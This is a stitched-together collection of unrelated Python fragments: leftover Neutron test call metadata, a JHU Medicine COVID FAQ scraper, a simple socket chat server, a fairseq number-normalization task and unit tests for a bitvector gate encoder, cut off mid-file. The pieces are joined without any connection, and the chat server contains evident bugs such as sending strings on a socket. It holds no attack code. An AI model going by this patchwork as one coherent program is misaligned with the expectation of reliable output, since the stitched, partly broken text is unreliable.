'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', 'DB_PLUGIN_KLASS'], {}), "('core_plugin', DB_PLUGIN_KLASS)\n", (3786, 3818), False, 'from oslo.config import cfg\n'), ((3965, 4075), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['neutron.tests.unit.dummy_plugin.DummyServicePlugin', 'dummy']"], {}), "('service_plugins', [\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin', 'dummy'])\n", (3986, 4075), False, 'from oslo.config import cfg\n'), ((4143, 4196), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', 'DB_PLUGIN_KLASS'], {}), "('core_plugin', DB_PLUGIN_KLASS)\n", (4164, 4196), False, 'from oslo.config import cfg\n'), ((4335, 4436), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['neutron.tests.unit.dummy_plugin.DummyServicePlugin']"], {}), "('service_plugins', [\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin'])\n", (4356, 4436), False, 'from oslo.config import cfg\n'), ((4504, 4610), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', '"""neutron.tests.unit.test_neutron_manager.MultiServiceCorePlugin"""'], {}), "('core_plugin',\n 'neutron.tests.unit.test_neutron_manager.MultiServiceCorePlugin')\n", (4525, 4610), False, 'from oslo.config import cfg\n'), ((4796, 4902), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', '"""neutron.tests.unit.test_neutron_manager.MultiServiceCorePlugin"""'], {}), "('core_plugin',\n 'neutron.tests.unit.test_neutron_manager.MultiServiceCorePlugin')\n", (4817, 4902), False, 'from oslo.config import cfg\n'), ((4976, 5005), 'neutron.manager.NeutronManager.get_instance', 'NeutronManager.get_instance', ([], {}), '()\n', (5003, 5005), False, 'from neutron.manager import NeutronManager\n'), ((5335, 5414), 'oslo.config.cfg.CONF.import_opt', 'cfg.CONF.import_opt', (['"""dhcp_agents_per_network"""', '"""neutron.db.agentschedulers_db"""'], {}), "('dhcp_agents_per_network', 'neutron.db.agentschedulers_db')\n", (5354, 5414), False, 'from oslo.config import cfg\n'), ((5507, 5558), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""dhcp_agents_per_network"""', '(2)'], {}), "('dhcp_agents_per_network', 2)\n", (5528, 5558), False, 'from oslo.config import cfg\n'), ((5622, 5673), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""dhcp_agents_per_network"""', '(0)'], {}), "('dhcp_agents_per_network', 0)\n", (5643, 5673), False, 'from oslo.config import cfg\n'), ((5740, 5792), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""dhcp_agents_per_network"""', '(-1)'], {}), "('dhcp_agents_per_network', -1)\n", (5761, 5792), False, 'from oslo.config import cfg\n'), ((5959, 6011), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', '"""dummy.plugin"""'], {}), "('core_plugin', 'dummy.plugin')\n", (5980, 6011), False, 'from oslo.config import cfg\n'), ((6148, 6249), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['neutron.tests.unit.dummy_plugin.DummyServicePlugin']"], {}), "('service_plugins', [\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin'])\n", (6169, 6249), False, 'from oslo.config import cfg\n'), ((6317, 6429), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', '"""neutron.tests.unit.test_neutron_manager.CorePluginWithAgentNotifiers"""'], {}), "('core_plugin',\n 'neutron.tests.unit.test_neutron_manager.CorePluginWithAgentNotifiers')\n", (6338, 6429), False, 'from oslo.config import cfg\n'), ((6662, 6689), 'neutron.manager.NeutronManager.get_plugin', 'NeutronManager.get_plugin', ([], {}), '()\n', (6687, 6689), False, 'from neutron.manager import NeutronManager\n'), ((2008, 2072), 'fixtures.MonkeyPatch', 'fixtures.MonkeyPatch', (['"""neutron.manager.NeutronManager._instance"""'], {}), "('neutron.manager.NeutronManager._instance')\n", (2028, 2072), False, 'import fixtures\n'), ((5470, 5497), 'neutron.manager.validate_post_plugin_load', 'validate_post_plugin_load', ([], {}), '()\n', (5495, 5497), False, 'from neutron.manager import validate_post_plugin_load\n'), ((5585, 5612), 'neutron.manager.validate_post_plugin_load', 'validate_post_plugin_load', ([], {}), '()\n', (5610, 5612), False, 'from neutron.manager import validate_post_plugin_load\n'), ((5703, 5730), 'neutron.manager.validate_post_plugin_load', 'validate_post_plugin_load', ([], {}), '()\n', (5728, 5730), False, 'from neutron.manager import validate_post_plugin_load\n'), ((5822, 5849), 'neutron.manager.validate_post_plugin_load', 'validate_post_plugin_load', ([], {}), '()\n', (5847, 5849), False, 'from neutron.manager import validate_post_plugin_load\n'), ((5923, 5949), 'neutron.manager.validate_pre_plugin_load', 'validate_pre_plugin_load', ([], {}), '()\n', (5947, 5949), False, 'from neutron.manager import validate_pre_plugin_load\n'), ((6038, 6064), 'neutron.manager.validate_pre_plugin_load', 'validate_pre_plugin_load', ([], {}), '()\n', (6062, 6064), False, 'from neutron.manager import validate_pre_plugin_load\n')]
|
# Copyright (c) Johns Hopkins University and its affiliates.
# This source code is licensed under the Apache 2 license found in the
# LICENSE file in the root directory of this source tree.
"""
JHU Medicine crawler
Expected page to crawl is
https://www.hopkinsmedicine.org/health/conditions-and-diseases/coronavirus/coronavirus-frequently-asked-questions
"""
__author__ = "<NAME>"
__copyright__ = "Copyright 2020, Johns Hopkins University"
__credits__ = ["<NAME>"]
__license__ = "Apache 2.0"
__version__ = "0.1"
__maintainer__ = "JHU-COVID-QA"
__email__ = "<EMAIL>"
__status__ = "Development"
import datetime
import time
import dateparser
import requests
import copy
from bs4 import BeautifulSoup
from covid_scraping import Conversion, Scraper
class JHUMedicineScraper(Scraper):
def scrape(self):
url = "https://www.hopkinsmedicine.org/health/conditions-and-diseases/coronavirus/coronavirus-frequently-asked-questions"
html = requests.get(url).text
soup = BeautifulSoup(html, 'lxml').find_all('div', {'class': 'rtf'})
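        # The final section ends with an update notice; the first seven
        # characters (presumably an "Updated" prefix) are skipped before the
        # remainder is parsed as the page's last-update time.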
lastUpdateTime = time.mktime(
dateparser.parse(
soup[-1].getText().strip()[7:])
.timetuple())
final_questions = []
        final_responses = []
for section in soup:
questions = section.find_all('h3')
for question in questions:
final_questions.append(question.get_text(strip=False))
soup_iter = question
answer = ""
while soup_iter.find_next_sibling() and soup_iter.find_next_sibling().name in [
'p', 'ul']:
soup_iter = soup_iter.find_next_sibling()
answer += " " + str(soup_iter)
                final_responses.append(answer)
converter = Conversion(
self._filename,
self._path)
        for q, a in zip(final_questions, final_responses):
converter.addExample({
'sourceUrl': url,
'sourceName': "JHU Medicine",
"needUpdate": True,
"containsURLs": False,
"typeOfInfo": "QA",
"isAnnotated": False,
"responseAuthority": "",
"question": q,
"answer": a,
"hasAnswer": True,
"targetEducationLevel": "NA",
"topic": [],
"extraData": {},
'targetLocation': '',
'language': 'en'
})
return converter.write()
def main():
scraper = JHUMedicineScraper(path=".", filename="JHU_Medicine")
scraper.scrape()
if __name__ == '__main__':
main()
|
[
"covid_scraping.Conversion",
"requests.get",
"bs4.BeautifulSoup"
] |
[((1814, 1852), 'covid_scraping.Conversion', 'Conversion', (['self._filename', 'self._path'], {}), '(self._filename, self._path)\n', (1824, 1852), False, 'from covid_scraping import Conversion, Scraper\n'), ((950, 967), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (962, 967), False, 'import requests\n'), ((988, 1015), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html', '"""lxml"""'], {}), "(html, 'lxml')\n", (1001, 1015), False, 'from bs4 import BeautifulSoup\n')]
|
"""
Basic chat server class.
"""
import socket
import select
import json
import ChatProtocole
class ChatServer:
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setblocking(0)
    # Distinct lists: a chained assignment (``a = b = []``) would alias
    # every name to the same list object.
    inputs, inputs_address, outputs = [], [], []
    readable, writable, exceptional = [], [], []
message_queues = ""
chat_protocol = {}
already_send = False
user_disconnect = False
def __init__(self, port=3492):
self.server.bind(('', port))
print("Serveur ON -> localhost:"+str(port))
self.server.listen(10)
self.inputs = [self.server]
self.inputs_address = [self.server.getsockname()]
self.chat_protocol = ChatProtocole.ChatProtocole()
def close_server(self):
for sock in self.chat_protocol.clients_connections:
sock.close()
def alreay_send_set(self, bool):
self.already_send = bool
def remove_from_inputs(self, server_adresse):
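        # inputs[0] / inputs_address[0] hold the listening server socket,
        # so the search for the client to drop starts at index 1.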
for i in range(1, len(self.inputs_address)):
if self.inputs_address[i] == server_adresse:
del self.inputs[i]
del self.inputs_address[i]
return i
def tuplify(self, listything):
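        # Recursively turn lists into tuples (descending into dict values) so
        # a JSON-decoded address can be compared with socket address tuples.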
if isinstance(listything, list): return tuple(map(self.tuplify, listything))
if isinstance(listything, dict): return {k: self.tuplify(v) for k, v in listything.items()}
return listything
def select(self):
try:
self.readable, self.writable, self.exceptional = select.select(self.inputs, self.chat_protocol.clients_connections, self.inputs)
except socket.error:
print()
def start_listen(self):
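        # Main event loop: accept new clients, relay JSON messages, and hand
        # the speaking turn to one client at a time via the chat protocol.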
while self.inputs:
self.select()
for s in self.readable:
if s is self.server:
connection, client_address = s.accept()
                    print('New connection from: ' + str(client_address))
connection.setblocking(0)
self.chat_protocol.add_client(connection)
self.inputs.append(connection)
self.inputs_address.append(client_address)
else:
if s not in self.inputs:
pass
                    try:
                        data = s.recv(4096).decode()
                    except socket.error:
                        print("err")
                        data = ""  # avoid a NameError below when the read fails
if data:
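                        # Messages are JSON objects of the form
                        # {"action": ..., "content": ..., "from": <pseudo>}.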
data_jsonify = json.loads(data)
action = data_jsonify["action"]
content = data_jsonify["content"]
pseudo = data_jsonify["from"]
if action == "user_disconnect":
content[0] = content[0].encode('ascii', 'backslashreplace')
content = self.tuplify(content)
index = self.remove_from_inputs(content)
data_to_send = json.dumps({"action": "user_disconnect", "content": "Deconnection de "+pseudo, "from": pseudo})
if index-1 == self.chat_protocol.client_number:
self.already_send = False
self.user_disconnect = True
self.chat_protocol.send_to_all(data_to_send)
elif s.getpeername() == self.chat_protocol.get_client_speak_connection().getpeername():
data_to_send = json.dumps({"action": "message", "content": content, "from": pseudo})
self.chat_protocol.send_to_all(data_to_send)
self.already_send = False
self.chat_protocol.next_client()
if s not in self.outputs:
self.outputs.append(s)
if self.user_disconnect:
self.user_disconnect = False
pass
# Handle outputs
for s in self.writable:
if self.chat_protocol.get_client_speak_connection() is None or s is None:
break
"""
ICI :
self.chat_protocol.get_client_speak_connection().getpeername()
ne fonctionne pas quand un client par alors que cest a lui de parler .... incomprehensible
"""
try:
if not self.chat_protocol.waiting and not self.already_send and (
s.getpeername() == self.chat_protocol.get_client_speak_connection().getpeername()):
data_to_send = json.dumps({"action": "yourTurn", "content": "Cest a votre tour de parler"})
s.send(data_to_send)
self.already_send = True
except socket.error:
self.chat_protocol.next_client()
print("haha")
# Launch the server
c = ChatServer()
c.start_listen()
|
[
"json.loads",
"socket.socket",
"json.dumps",
"select.select",
"ChatProtocole.ChatProtocole"
] |
[((135, 184), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (148, 184), False, 'import socket\n'), ((682, 711), 'ChatProtocole.ChatProtocole', 'ChatProtocole.ChatProtocole', ([], {}), '()\n', (709, 711), False, 'import ChatProtocole\n'), ((1505, 1584), 'select.select', 'select.select', (['self.inputs', 'self.chat_protocol.clients_connections', 'self.inputs'], {}), '(self.inputs, self.chat_protocol.clients_connections, self.inputs)\n', (1518, 1584), False, 'import select\n'), ((2470, 2486), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (2480, 2486), False, 'import json\n'), ((4643, 4719), 'json.dumps', 'json.dumps', (["{'action': 'yourTurn', 'content': 'Cest a votre tour de parler'}"], {}), "({'action': 'yourTurn', 'content': 'Cest a votre tour de parler'})\n", (4653, 4719), False, 'import json\n'), ((2971, 3072), 'json.dumps', 'json.dumps', (["{'action': 'user_disconnect', 'content': 'Deconnection de ' + pseudo,\n 'from': pseudo}"], {}), "({'action': 'user_disconnect', 'content': 'Deconnection de ' +\n pseudo, 'from': pseudo})\n", (2981, 3072), False, 'import json\n'), ((3489, 3558), 'json.dumps', 'json.dumps', (["{'action': 'message', 'content': content, 'from': pseudo}"], {}), "({'action': 'message', 'content': content, 'from': pseudo})\n", (3499, 3558), False, 'import json\n')]
|
import logging
import os
import numpy as np
from fairseq import utils
from fairseq import data
from fairseq.data import (
ConcatSentencesDataset,
Dictionary,
IdDataset,
NestedDictionaryDataset,
NumelDataset,
NumSamplesDataset,
OffsetTokensDataset,
PrependTokenDataset,
RawLabelDataset,
RightPadDataset,
RollDataset,
SortDataset,
StripTokenDataset,
NumberValueDataset,
data_utils,
)
from fairseq.data.shorten_dataset import maybe_shorten_dataset
from fairseq.tasks import LegacyFairseqTask, register_task
from .sentence_prediction import SentencePredictionTask
import sentencepiece as spm
logger = logging.getLogger(__name__)
@register_task("sentence_prediction_num_norm")
class SentencePredictionNumNormTask(SentencePredictionTask):
@staticmethod
def add_args(parser):
"""Add task-specific arguments to the parser."""
parser.add_argument("data", metavar="FILE", help="file prefix for data")
parser.add_argument(
"--num-classes",
type=int,
default=-1,
help="number of classes or regression targets",
)
parser.add_argument(
"--init-token",
type=int,
default=None,
help="add token at the beginning of each batch item",
)
parser.add_argument(
"--separator-token",
type=int,
default=None,
help="add separator token between inputs",
)
parser.add_argument("--regression-target", action="store_true", default=False)
parser.add_argument("--no-shuffle", action="store_true", default=False)
parser.add_argument(
"--shorten-method",
default="none",
choices=["none", "truncate", "random_crop"],
help="if not none, shorten sequences that exceed --tokens-per-sample",
)
parser.add_argument(
"--shorten-data-split-list",
default="",
help="comma-separated list of dataset splits to apply shortening to, "
'e.g., "train,valid" (default: all dataset splits)',
)
parser.add_argument(
"--add-prev-output-tokens",
action="store_true",
default=False,
help="add prev_output_tokens to sample, used for encoder-decoder arch",
)
parser.add_argument('--spm_path', type=str)
        parser.add_argument('--number_value_cutoff', type=int, default=65500) # largest value that can safely be passed in fp16 (max is 65504)
parser.add_argument('--send_log_value', default=False, action='store_true')
def __init__(self, args, data_dictionary, label_dictionary):
super().__init__(args, data_dictionary, label_dictionary)
assert "▁<num>" in self.dictionary.symbols, "▁<num> not in the tokenizer vocab!"
assert "▁</num>" in self.dictionary.symbols, "▁</num> not in the tokenizer vocab!"
self.bon_idx = self.dictionary.indices['▁<num>']
self.eon_idx = self.dictionary.indices['▁</num>']
print('| bon_idx', self.bon_idx, flush=True)
print('| eon_idx', self.eon_idx, flush=True)
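        # SentencePiece model handed to NumberValueDataset below, presumably
        # to decode number tokens back into their numeric values.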
self.tokenizer = spm.SentencePieceProcessor(model_file=self.args.spm_path)
def load_dataset(self, split, combine=False, **kwargs):
"""Load a given dataset split (e.g., train, valid, test)."""
def get_path(key, split):
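            # Dataset layout: <args.data>/<key>/<split>, e.g. <data>/input0/train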
return os.path.join(self.args.data, key, split)
def make_dataset(key, dictionary):
split_path = get_path(key, split)
try:
dataset = data_utils.load_indexed_dataset(
split_path,
dictionary,
self.args.dataset_impl,
combine=combine,
)
except Exception as e:
if "StorageException: [404] Path not found" in str(e):
logger.warning(f"dataset {e} not found")
dataset = None
else:
raise e
return dataset
input0 = make_dataset("input0", self.source_dictionary)
assert input0 is not None, "could not find dataset: {}".format(
get_path("input0", split)
)
input1 = make_dataset("input1", self.source_dictionary)
if self.args.init_token is not None:
input0 = PrependTokenDataset(input0, self.args.init_token)
if input1 is None:
src_tokens = input0
else:
if self.args.separator_token is not None:
input1 = PrependTokenDataset(input1, self.args.separator_token)
src_tokens = ConcatSentencesDataset(input0, input1)
with data_utils.numpy_seed(self.args.seed):
shuffle = np.random.permutation(len(src_tokens))
src_tokens = maybe_shorten_dataset(
src_tokens,
split,
self.args.shorten_data_split_list,
self.args.shorten_method,
self.max_positions(),
self.args.seed,
)
dataset = {
"id": IdDataset(),
"net_input": {
"src_tokens": RightPadDataset(
src_tokens,
pad_idx=self.source_dictionary.pad(),
),
"src_number_token_values": NumberValueDataset(
src_tokens,
vocab=self.dictionary,
tokenizer=self.tokenizer,
number_value_cutoff=self.args.number_value_cutoff,
send_log_value=self.args.send_log_value
),
"src_lengths": NumelDataset(src_tokens, reduce=False),
},
"nsentences": NumSamplesDataset(),
"ntokens": NumelDataset(src_tokens, reduce=True),
}
if self.args.add_prev_output_tokens:
prev_tokens_dataset = RightPadDataset(
RollDataset(src_tokens, 1),
pad_idx=self.dictionary.pad(),
)
dataset["net_input"].update(
prev_output_tokens=prev_tokens_dataset,
)
if not self.args.regression_target:
label_dataset = make_dataset("label", self.label_dictionary)
if label_dataset is not None:
dataset.update(
target=OffsetTokensDataset(
StripTokenDataset(
label_dataset,
id_to_strip=self.label_dictionary.eos(),
),
offset=-self.label_dictionary.nspecial,
)
)
else:
label_path = "{0}.label".format(get_path("label", split))
if os.path.exists(label_path):
def parse_regression_target(i, line):
values = line.split()
assert (
len(values) == self.args.num_classes
), f'expected num_classes={self.args.num_classes} regression target values on line {i}, found: "{line}"'
return [float(x) for x in values]
with open(label_path) as h:
dataset.update(
target=RawLabelDataset(
[
parse_regression_target(i, line.strip())
for i, line in enumerate(h.readlines())
]
)
)
nested_dataset = NestedDictionaryDataset(
dataset,
sizes=[src_tokens.sizes],
)
if self.args.no_shuffle:
dataset = nested_dataset
else:
dataset = SortDataset(
nested_dataset,
# shuffle
sort_order=[shuffle],
)
logger.info("Loaded {0} with #samples: {1}".format(split, len(dataset)))
self.datasets[split] = dataset
return self.datasets[split]
|
[
"fairseq.data.NumelDataset",
"fairseq.data.NestedDictionaryDataset",
"fairseq.data.NumberValueDataset",
"sentencepiece.SentencePieceProcessor",
"fairseq.tasks.register_task",
"fairseq.data.PrependTokenDataset",
"fairseq.data.SortDataset",
"os.path.exists",
"fairseq.data.ConcatSentencesDataset",
"fairseq.data.NumSamplesDataset",
"fairseq.data.data_utils.numpy_seed",
"fairseq.data.RollDataset",
"fairseq.data.IdDataset",
"fairseq.data.data_utils.load_indexed_dataset",
"os.path.join",
"logging.getLogger"
] |
[((660, 687), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (677, 687), False, 'import logging\n'), ((691, 736), 'fairseq.tasks.register_task', 'register_task', (['"""sentence_prediction_num_norm"""'], {}), "('sentence_prediction_num_norm')\n", (704, 736), False, 'from fairseq.tasks import LegacyFairseqTask, register_task\n'), ((3218, 3275), 'sentencepiece.SentencePieceProcessor', 'spm.SentencePieceProcessor', ([], {'model_file': 'self.args.spm_path'}), '(model_file=self.args.spm_path)\n', (3244, 3275), True, 'import sentencepiece as spm\n'), ((7624, 7682), 'fairseq.data.NestedDictionaryDataset', 'NestedDictionaryDataset', (['dataset'], {'sizes': '[src_tokens.sizes]'}), '(dataset, sizes=[src_tokens.sizes])\n', (7647, 7682), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((3460, 3500), 'os.path.join', 'os.path.join', (['self.args.data', 'key', 'split'], {}), '(self.args.data, key, split)\n', (3472, 3500), False, 'import os\n'), ((4426, 4475), 'fairseq.data.PrependTokenDataset', 'PrependTokenDataset', (['input0', 'self.args.init_token'], {}), '(input0, self.args.init_token)\n', (4445, 4475), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((4710, 4748), 'fairseq.data.ConcatSentencesDataset', 'ConcatSentencesDataset', (['input0', 'input1'], {}), '(input0, input1)\n', (4732, 4748), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((4763, 4800), 'fairseq.data.data_utils.numpy_seed', 'data_utils.numpy_seed', (['self.args.seed'], {}), '(self.args.seed)\n', (4784, 4800), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((5147, 5158), 'fairseq.data.IdDataset', 'IdDataset', ([], {}), '()\n', (5156, 5158), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((5791, 5810), 'fairseq.data.NumSamplesDataset', 'NumSamplesDataset', ([], {}), '()\n', (5808, 5810), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((5835, 5872), 'fairseq.data.NumelDataset', 'NumelDataset', (['src_tokens'], {'reduce': '(True)'}), '(src_tokens, reduce=True)\n', (5847, 5872), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((6822, 6848), 'os.path.exists', 'os.path.exists', (['label_path'], {}), '(label_path)\n', (6836, 6848), False, 'import os\n'), ((7825, 7874), 'fairseq.data.SortDataset', 'SortDataset', (['nested_dataset'], {'sort_order': '[shuffle]'}), '(nested_dataset, sort_order=[shuffle])\n', (7836, 7874), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((3635, 3736), 'fairseq.data.data_utils.load_indexed_dataset', 'data_utils.load_indexed_dataset', (['split_path', 'dictionary', 'self.args.dataset_impl'], {'combine': 'combine'}), '(split_path, dictionary, self.args.\n dataset_impl, combine=combine)\n', (3666, 3736), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((4629, 4683), 'fairseq.data.PrependTokenDataset', 'PrependTokenDataset', (['input1', 'self.args.separator_token'], {}), '(input1, self.args.separator_token)\n', (4648, 4683), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((5386, 5566), 'fairseq.data.NumberValueDataset', 'NumberValueDataset', (['src_tokens'], {'vocab': 'self.dictionary', 'tokenizer': 'self.\ntokenizer', 'number_value_cutoff': 'self.args.number_value_cutoff', 'send_log_value': 'self.args.send_log_value'}), '(src_tokens, vocab=self.dictionary, tokenizer=self.\n tokenizer, number_value_cutoff=self.args.number_value_cutoff,\n send_log_value=self.args.send_log_value)\n', (5404, 5566), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((5710, 5748), 'fairseq.data.NumelDataset', 'NumelDataset', (['src_tokens'], {'reduce': '(False)'}), '(src_tokens, reduce=False)\n', (5722, 5748), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((5997, 6023), 'fairseq.data.RollDataset', 'RollDataset', (['src_tokens', '(1)'], {}), '(src_tokens, 1)\n', (6008, 6023), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n')]
|
import abc
import unittest
import itertools
import math
import cscl.bitvector_gate_encoders as bvg
import cscl.interfaces as cscl_if
from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver
from cscl_tests.testutils.logging_clause_consumer_decorator import LoggingClauseConsumerDecorator
class TestLiteralFactory(cscl_if.CNFLiteralFactory):
def __init__(self):
self.max_var = 0
def create_literal(self):
self.max_var += 1
return self.max_var
def get_num_variables(self):
return self.max_var
def has_literal(self, lit):
return lit != 0 and abs(lit) <= self.max_var
class CollectingClauseConsumer(cscl_if.ClauseConsumer):
def __init__(self):
self.clauses = []
def consume_clause(self, clause):
self.clauses.append(clause)
def has_clause(self, clause):
return clause in self.clauses
def get_clauses_in_consumption_order(self):
return self.clauses[:]
def get_num_clauses(self):
return len(self.clauses)
class TestEncodeGateVector(unittest.TestCase):
def test_is_noop_on_empty_inputs(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
def __should_not_be_called(*_):
self.assertTrue(False, "This function should not be called")
result = bvg.encode_gate_vector(clause_consumer, lit_factory,
__should_not_be_called,
lhs_input_lits=[], rhs_input_lits=[], output_lits=[])
self.assertEqual(len(result), 0)
self.assertEqual(clause_consumer.get_num_clauses(), 0)
self.assertEqual(lit_factory.get_num_variables(), 0)
def test_throws_exception_when_input_vec_lengths_mismatch(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
def __noop_encoder(*_):
pass
lits = [lit_factory.create_literal() for _ in range(10)]
with self.assertRaises(ValueError):
bvg.encode_gate_vector(clause_consumer, lit_factory,
__noop_encoder,
lhs_input_lits=[lits[0]],
rhs_input_lits=[lits[1], lits[2]],
output_lits=[lits[3]])
self.assertEqual(clause_consumer.get_num_clauses(), 0)
self.assertEqual(lit_factory.get_num_variables(), 10)
def test_throws_exception_when_output_vec_length_mismatches(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
def __noop_encoder(*_):
pass
lits = [lit_factory.create_literal() for _ in range(10)]
with self.assertRaises(ValueError):
bvg.encode_gate_vector(clause_consumer, lit_factory,
__noop_encoder,
lhs_input_lits=[lits[0], lits[1]],
rhs_input_lits=[lits[2], lits[3]],
output_lits=[lits[4]])
self.assertEqual(clause_consumer.get_num_clauses(), 0)
self.assertEqual(lit_factory.get_num_variables(), 10)
def test_generates_None_literals_when_no_outputs_specified(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
lits = [lit_factory.create_literal() for _ in range(10)]
collected_output_lits = []
def __output_collecting_encoder(_1, _2, _3, output_lit):
collected_output_lits.append(output_lit)
return output_lit
result = bvg.encode_gate_vector(clause_consumer, lit_factory, __output_collecting_encoder,
lhs_input_lits=[lits[0], lits[1]],
rhs_input_lits=[lits[2], lits[3]],
output_lits=None)
self.assertEqual(result, collected_output_lits)
self.assertEqual(result, [None, None])
@staticmethod
def __create_recording_encoder(recording_target: list):
def __recording_encoder(*args):
recording_target.append(args)
return -1
return __recording_encoder
def test_calls_basic_encoder_once_for_unary_bit_vectors(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
recording_target = []
bvg.encode_gate_vector(clause_consumer, lit_factory,
self.__create_recording_encoder(recording_target),
lhs_input_lits=[1],
rhs_input_lits=[2],
output_lits=[3])
expected_rt = [(clause_consumer, lit_factory, (1, 2), 3)]
self.assertEqual(recording_target, expected_rt,
"Unexpected encoder calls:\n" + str(recording_target) + "\nvs.\n" + str(expected_rt))
def test_calls_basic_encoder_thrice_for_ternary_bit_vectors(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
recording_target = []
bvg.encode_gate_vector(clause_consumer, lit_factory,
self.__create_recording_encoder(recording_target),
lhs_input_lits=[10, 20, 30],
rhs_input_lits=[11, 21, 31],
output_lits=[1, 2, 3])
expected_rt = [(clause_consumer, lit_factory, (10, 11), 1),
(clause_consumer, lit_factory, (20, 21), 2),
(clause_consumer, lit_factory, (30, 31), 3)]
self.assertEqual(recording_target, expected_rt,
"Unexpected encoder calls:\n" + str(recording_target) + "\nvs.\n" + str(expected_rt))
def int_to_bitvec(i, result_width):
return tuple(1 if (i & 1 << idx) != 0 else 0 for idx in range(0, result_width))
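# LSB-first encoding, e.g. int_to_bitvec(5, 4) == (1, 0, 1, 0).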
def apply_truth_table_setting(positive_lits, setting):
return [x if s >= 1 else -x for x, s in zip(positive_lits, setting)]
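# A setting of 1 keeps the literal positive, 0 negates it,
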